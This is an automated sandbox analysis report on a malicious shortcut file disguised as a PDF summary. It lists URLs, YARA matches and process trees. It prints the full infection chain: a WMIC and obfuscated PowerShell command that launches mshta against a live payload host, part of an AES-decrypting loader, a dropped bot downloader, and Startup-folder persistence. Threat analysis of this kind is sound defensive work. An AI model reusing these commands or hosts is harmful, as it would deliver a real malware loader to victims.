        Source: php.exe, 00000018.00000002.2893070291.000001E12DC00000.00000004.00001000.00020000.00000000.sdmp, php.exe, 0000001C.00000002.2892874564.0000014E5D400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://rodgersluciecassy.com/mbp/apit.phpxBdmFzdA==
        Source: php.exe, 0000001C.00000002.2892874564.0000014E5D471000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://rodgersluciecassy.com/mbp/down/
        Source: php_bot_downloader_v2-AVERAGE-BOI-CLN.exe, 0000000C.00000002.2016578426.00000248770AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rodgersluciecassy.com/mbp/down/php-8.2.11-Win32-vs16-x64.zip
        Source: powershell.exe, 00000004.00000002.1654335033.000002A9CD591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BAB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BCDA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd-//OASIS//DTD
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: http://www.php.net/
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: http://www.zend.com/
        Source: powershell.exe, 00000004.00000002.1654335033.000002A9CD5BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1654335033.000002A9CD5A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BAB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000007.00000002.1814428015.000001F41BB25000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000007.00000002.1814428015.000001F41BB25000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000007.00000002.1814428015.000001F41BB25000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E562000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E512000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E562000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E543000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E562000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BCDA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
        Source: php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: https://github.com/php/php-src/issues
        Source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmp, php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: https://github.com/php/php-src/issues/(
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp | String found in binary or memory: https://github.com/php/php-src/issuesbefore
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40C769000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
        Source: mshta.exe, 00000005.00000003.1840043057.000001E30CCDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1888680116.000001E30CCE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1885470413.000001E30CCDE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40D71C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BCDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://myfilebuilders.com
        Source: mshta.exe, 00000005.00000002.1888633604.000001E30CCBF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840043057.000001E30CCBC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://myfilebuilders.com/
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BCDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://myfilebuilders.com/Professional_Social_Media_Report.pdf
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLN.exe
        Source: mshta.exe, 00000005.00000002.1891448776.000001EB139B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840043057.000001E30CCBC000.00000004.00000020.00020000.00000000.sdmp, HateSpeech2024_Summary.pdf.lnk.bin.lnk | String found in binary or memory: https://myfilebuilders.com/samm
        Source: powershell.exe, 00000007.00000002.1814428015.000001F41BB25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E562000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
        Source: php.exe | String found in binary or memory: https://www.php.net
        Source: php.exe | String found in binary or memory: https://www.php.net/
        Source: php.exe, 00000018.00000002.2897155503.00007FFDF9E2C000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896806357.00007FFDF9E2C000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.php.net/D
        Source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmp, php.exe, 00000018.00000000.2016752512.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 0000001C.00000000.2188550672.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp, php_pdo_mysql.dll.21.dr, php_sysvshm.dll.21.dr, php_mysqli.dll.21.dr, php_zend_test.dll.21.drString found in binary or memory: https://www.php.netD

        System Summary

        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1], type: DROPPED | Matched rule: Emmenhtal Loader string Author: Sekoia.io
        Source: Yara match | File source: HateSpeech2024_Summary.pdf.lnk.bin.lnk, type: SAMPLE
        Source: WMIC.exe, 00000000.00000002.1636119414.000001DCDDE90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32\Wbem\wmic.exe"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')"C:\Users\user\Desktop\HateSpeech2024_Summary.pdf.lnk.bin.lnkWinsta0\Defaultmemstr_74a538d7-a
        Source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: CompanyNameThe PHP Group6
        Source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: The PHP Group0
        Source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: PHP %s, Copyright (c) The PHP Group
        Source: tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: CompanyNameThe PHP Group6
        Source: tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: The PHP Group0
        Source: tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: PHP %s, Copyright (c) The PHP Group
        Source: tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: CompanyNameThe PHP Group6
        Source: tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: The PHP Group0
        Source: tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: PHP %s, Copyright (c) The PHP Group
        Source: php.exe | String found in binary or memory: The PHP Group
        Source: php.exe | String found in binary or memory: PHP %s (%s) (built: %s %s) (%s) Copyright (c) The PHP Group %s
        Source: php.exe | String found in binary or memory: PHP %s (%s) (built: %s %s) (%s)Copyright (c) The PHP Group%s
        Source: php.exe, 00000018.00000000.2016752512.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: CompanyNameThe PHP Group0
        Source: php.exe, 00000018.00000000.2016752512.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: The PHP Group0
        Source: php.exe, 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: Copyright (c) The PHP Group
        Source: php.exe, 00000018.00000002.2897155503.00007FFDF9E2C000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: CompanyNameThe PHP GroupV
        Source: php.exe, 00000018.00000002.2897155503.00007FFDF9E2C000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: The PHP Group0
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: it under the terms of the PHP License as published by the PHP Group
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: This program is free software; you can redistribute it and/or modify it under the terms of the PHP License as published by the PHP Group and included in the distribution in the file: LICENSE
        Source: php.exe, 00000018.00000000.2016553083.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: Copyright (c) The PHP Group
        Source: php.exe, 0000001C.00000000.2188550672.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: CompanyNameThe PHP Group0
        Source: php.exe, 0000001C.00000000.2188550672.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: The PHP Group0
        Source: php.exe, 0000001C.00000002.2896806357.00007FFDF9E2C000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: CompanyNameThe PHP GroupV
        Source: php.exe, 0000001C.00000002.2896806357.00007FFDF9E2C000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: The PHP Group0
        Source: php.exe, 0000001C.00000000.2188454449.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: Copyright (c) The PHP Group
        Source: php.exe, 0000001C.00000002.2894997934.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: Copyright (c) The PHP Group
        Source: php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: it under the terms of the PHP License as published by the PHP Group
        Source: php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: This program is free software; you can redistribute it and/or modify it under the terms of the PHP License as published by the PHP Group and included in the distribution in the file: LICENSE
        Source: php_pdo_mysql.dll.21.dr | String found in binary or memory: CompanyNameThe PHP GroupR
        Source: php_pdo_mysql.dll.21.dr | String found in binary or memory: The PHP Group0
        Source: php_sysvshm.dll.21.dr | String found in binary or memory: CompanyNameThe PHP GroupV
        Source: php_sysvshm.dll.21.dr | String found in binary or memory: The PHP Group0
        Source: php_mysqli.dll.21.dr | String found in binary or memory: CompanyNameThe PHP Group6
        Source: php_mysqli.dll.21.dr | String found in binary or memory: The PHP Group0
        Source: php_zend_test.dll.21.dr | String found in binary or memory: CompanyNameThe PHP GroupL
        Source: php_zend_test.dll.21.dr | String found in binary or memory: The PHP Group0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe
        Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
        Source: HateSpeech2024_Summary.pdf.lnk.bin.lnk | LNK file: process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')"
        Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8920FA4_2_00007FFD9B8920FA
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E4514C12_2_00007FF658E4514C
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E4029012_2_00007FF658E40290
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E3924812_2_00007FF658E39248
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E43BFC12_2_00007FF658E43BFC
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E40D1C12_2_00007FF658E40D1C
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E3D48012_2_00007FF658E3D480
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E46D7C12_2_00007FF658E46D7C
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E41F0412_2_00007FF658E41F04
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E35E9A12_2_00007FF658E35E9A
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E3564412_2_00007FF658E35644
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E3A11012_2_00007FF658E3A110
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E4211012_2_00007FF658E42110
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E3503812_2_00007FF658E35038
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeCode function: 24_2_00007FF7498C1B1024_2_00007FF7498C1B10
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeCode function: 24_2_00007FF7498C97D024_2_00007FF7498C97D0
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeCode function: 24_2_00007FF7498C633024_2_00007FF7498C6330
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeCode function: 24_2_00007FFE1A52777424_2_00007FFE1A527774
        Source: icudt71.dll.21.dr | Static PE information: No import functions for PE file found
        Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
        Source: C:\Windows\System32\mshta.exe | Process created: Commandline size = 3004
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1], type: DROPPEDMatched rule: emmenhtal_strings_hta_exe author = Sekoia.io, description = Emmenhtal Loader string, creation_date = 2024-09-06, classification = TLP:CLEAR, version = 1.0, id = 64e08610-e8a4-4edd-8f6b-d4e8d2b47d87, hash = e86a22f1c73b85678e64341427c7193ba65903f3c0f29af2e65d7c56d833d912
        Source: classification engine | Classification label: mal100.troj.expl.evad.winLNK@45/150@0/3
        Source: C:\Windows\System32\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9168:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2128:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9088:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ubirbunw.cvo.ps1
        Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs"
        Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
        Source: C:\Windows\System32\conhost.exe | File read: C:\Users\desktop.ini
        Source: C:\Windows\System32\wbem\WMIC.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: HateSpeech2024_Summary.pdf.lnk.bin.lnk | ReversingLabs: Detection: 23%
        Source: HateSpeech2024_Summary.pdf.lnk.bin.lnk | Virustotal: Detection: 27%
        Source: unknown | Process created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')"
        Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://myfilebuilders.com/samm"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://myfilebuilders.com/samm
        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function wLh ($iUUDD){return -split ($iUUDD -replace '..', '0x$& ')};$feiFxp = wLh($ddg.SubString(0, 2464));$zXe = [System.Security.Cryptography.Aes]::Create();$zXe.Key = wLh($ddg.SubString(2464));$zXe.IV = New-Object byte[] 16;$QlaSHZgH = $zXe.CreateDecryptor();$PwiNROQ = [System.String]::new($QlaSHZgH.TransformFinalBlock($feiFxp, 0,$feiFxp.Leng
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Professional_Social_Media_Report.pdf"
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1720,i,17340846460468953801,1805849140092646528,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe "C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe"
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C tar -xf "C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip" -C "C:\Users\user\AppData\Roaming"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tar.exe tar -xf "C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip" -C "C:\Users\user\AppData\Roaming"
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
